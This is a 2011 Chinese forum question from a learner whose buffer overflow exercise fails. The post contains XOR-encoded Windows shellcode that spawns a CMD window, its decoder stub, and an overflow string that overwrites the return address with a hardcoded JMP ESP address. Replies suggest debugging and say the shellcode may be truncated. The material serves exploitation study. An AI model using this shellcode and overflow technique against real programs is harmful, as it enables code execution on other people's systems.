缓冲区溢出有关问题
发布时间:2011-07-03 07:10:23 文章来源:www.iduyao.cn 采编人员:星星草
缓冲区溢出问题
最近看了一下缓冲区溢出的书,编了以下这个小例子,功能是弹出一个CMD窗口
我把SHELLCODE通过异或法编码~
//decode 解码
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\xE8\x03\x80\x34\x0A\x97\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
//enshellcode 异或后的shellcode
"\x1c\x7b\xff\xdb\xdb\x97\x97\xff\xc5\xc3"
"\xb9\xf3\xff\xda\xc4\xc1\xd4\xc3\x2f\xec"
"\x8a\x17\xeb\x68\x47\xff\xf4\xf8\xfa\x97"
"\xff\xf6\xf9\xf3\xb9\xff\xf4\xf8\xfa\xfa"
"\xc3\x2f\x50\x4\x28\xe0\x68\x47\x1c\x72";
我把以上放在测试shellcode的程序中是能够成功的
测试代码:
void main()
{
((void (*)(void))&shellcode)();
}
但放在以下程序却不知为何不成功了
#include<stdio.h>
#include<string.h>
#include<windows.h>
#include<conio.h>
char name[]=
"\x90\x90\x90\x90"//name[0]-name[3]
"\x90\x90\x90\x90"//name[4]-name[7]
"\x90\x90\x90\x90"//覆盖ebp
"\x12\x45\xfa\x7f"//覆盖成JMP ESP的地址,通用地址7ffa4512!
//decode
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\xE8\x03\x80\x34\x0A\x97\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
//enshellcode
"\x1c\x7b\xff\xdb\xdb\x97\x97\xff\xc5\xc3"
"\xb9\xf3\xff\xda\xc4\xc1\xd4\xc3\x2f\xec"
"\x8a\x17\xeb\x68\x47\xff\xf4\xf8\xfa\x97"
"\xff\xf6\xf9\xf3\xb9\xff\xf4\xf8\xfa\xfa"
"\xc3\x2f\x50\x4\x28\xe0\x68\x47\x1c\x72";
int main()
{
char output[8];
strcpy(output,name);
for(int i=0;output[i];i++)
printf("\\0x%x",output[i]);
return 0 ;
}
那个覆盖地址是绝对正确的,因为已经测试过了,但不知为何这个程序就是不能实现弹出一个CMD窗口
请高手们帮帮忙,这个问题已困扰了我很久........
------解决方案--------------------
用OD调调
------解决方案--------------------
大概是因为SHELLCODE过长最终被截断了
友情提示:
信息收集于互联网,如果您发现错误或造成侵权,请及时通知本站更正或删除,具体联系方式见页面底部联系我们,谢谢。
其他相似内容:
-
网络信息安全技术和网络安全技术有什么不同
请问:网络信息安全技术和网络安全技术有什么不同,如果自学网络信息安全技术/网络安全技...
-
请教一域名解析到多个共享IP
新买一个域名 17mf8.com
现有两个空间,里面分别放着一个论坛程序,一个主网站程序.两个空间都是共享I...
-
刷客动力搜索引擎seo刷流量刷百度下拉列表刷广告软件的用法(配图)
先看官方的介绍:
刷客动力网络营销系统工具是由好耶网络(...
-
CryptAcquireContext和CPAcquireContext有什么区别?
最近在搞CSP的开发,一直用CryptAcquireContext这个函数获取句柄,后来看了一些资...
-
冰天雪地裸体腾空360° 跪玻璃 求一个收费的长期的稳定快速的VPN
冰天雪地裸体腾空360° 跪玻璃 求一个收费的长期的稳定...
-
全国大学生信息安全竞赛
我是一位大二的信息安全专业的学生,想参加明年的全国大学生信息安全竞赛,不过不知道选什么课题之类的,比较...
-
网址能ping通,但是打不开网页
今天遇到这么一个问题。
网页打不开,提示说“载入页面时到服务器的连接被重置”,也不知道是怎么回事,但...
-
对Nfsen和Nfdump比较熟的来指点我下
假如我想抓网络信息,用Nfdump将nfcapd抓的信息解析出来可以存入一个文本,然后在nfsen图形界面...
-
不装杀毒软件电脑会有多大的危险?
装了个卡巴斯基,结果用个word它都查杀,杀毒能力强,但这是宁可错杀一千,不能漏网一个的手段,感觉这软...
-
笔记本装了win7通过无线路由上网,虚拟机装了fedora。fedora 无法ping通win7
笔记本装了win7通过无线路由上网,虚拟机装了fedora。fe...